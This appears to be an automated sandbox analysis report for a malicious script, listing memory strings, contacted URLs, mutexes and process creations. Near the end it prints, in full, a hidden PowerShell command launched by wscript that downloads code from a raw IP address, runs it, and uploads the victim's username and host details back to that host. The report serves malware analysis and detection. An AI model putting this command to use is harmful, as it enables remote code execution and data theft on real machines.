Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb< source: powershell.exe, 0000000D.00000002.3233454572.0000024390021000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbF source: powershell.exe, 0000000D.00000002.3297826331.00000243AA250000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.3297826331.00000243AA250000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n.pdb source: powershell.exe, 0000000D.00000002.3297826331.00000243AA250000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.3297826331.00000243AA208000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.Management.Automation.pdbpdbr source: powershell.exe, 0000000D.00000002.3297826331.00000243AA223000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdbFz source: powershell.exe, 0000000D.00000002.3297826331.00000243AA26E000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.pdbepping source: powershell.exe, 0000000D.00000002.3297826331.00000243AA26E000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: powershell.exe, 0000000D.00000002.3297826331.00000243AA208000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3233454572.0000024390021000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3297826331.00000243AA250000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.3233454572.0000024390021000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32B source: powershell.exe, 0000000D.00000002.3296638948.00000243AA072000.00000004.00000020.00020000.00000000.sdmp |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: powershell.exe, 00000014.00000002.4914304622.00000156B2F10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B2F21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:49210/page213 |
Source: powershell.exe, 00000014.00000002.4914429609.00000156B33D6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:49210/page213testf8.GetByteses |
Source: powershell.exe, 0000000D.00000002.3234872421.000002439308E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3234872421.0000024393016000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881 |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024393097000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881( |
Source: powershell.exe, 00000014.00000002.4914429609.00000156B33D6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881/HcKOA |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024393204000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881/HcKOAh |
Source: powershell.exe, 00000014.00000002.4914304622.00000156B2F10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B2F21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt |
Source: powershell.exe, 0000000D.00000002.3234458862.0000024390175000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881/hckoahazgdepkgkf/page213/upgrade.txt |
Source: powershell.exe, 0000000D.00000002.3234458862.0000024390175000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4913800857.00000156B15A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: svchost.exe, 00000008.00000002.4138837250.0000021918200000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ver) |
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.4.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/ |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567 |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe |
Source: qmgr.db.8.dr |
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
Source: powershell.exe, 00000000.00000002.2479815922.0000025280246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2520102751.00000252901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2520102751.000002529007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3234872421.0000024393432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3287856012.00000243A1A92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3287856012.00000243A1BD5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024391C4D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.2479815922.0000025280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3234872421.0000024391A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B2F3B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.2479815922.000002528197A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024391C4D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.2479815922.0000025280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3234872421.0000024391A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B2F7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B2F69000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000D.00000002.3287856012.00000243A1BD5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000D.00000002.3287856012.00000243A1BD5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000D.00000002.3287856012.00000243A1BD5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: svchost.exe, 00000008.00000003.2512084051.0000021918048000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr |
String found in binary or memory: https://g.live.com/odclientsettings/Prod.C: |
Source: svchost.exe, 00000008.00000003.2512084051.0000021917FE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr |
String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C: |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024391C4D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024392BBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B3474000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: App1727703151068771400_9732F0DB-5EDA-47CD-9232-258D813B5AF5.log.4.dr |
String found in binary or memory: https://login.windows.net |
Source: powershell.exe, 00000000.00000002.2479815922.0000025280246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2520102751.00000252901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2520102751.000002529007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2479815922.0000025281C2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3234872421.0000024393432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3287856012.00000243A1A92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3287856012.00000243A1BD5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.2479815922.000002528197A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.org |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep 12;start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://196.196.156.2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://196.196.156.2:49210/page213',$drpy);} |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4468:120:WilError_03 |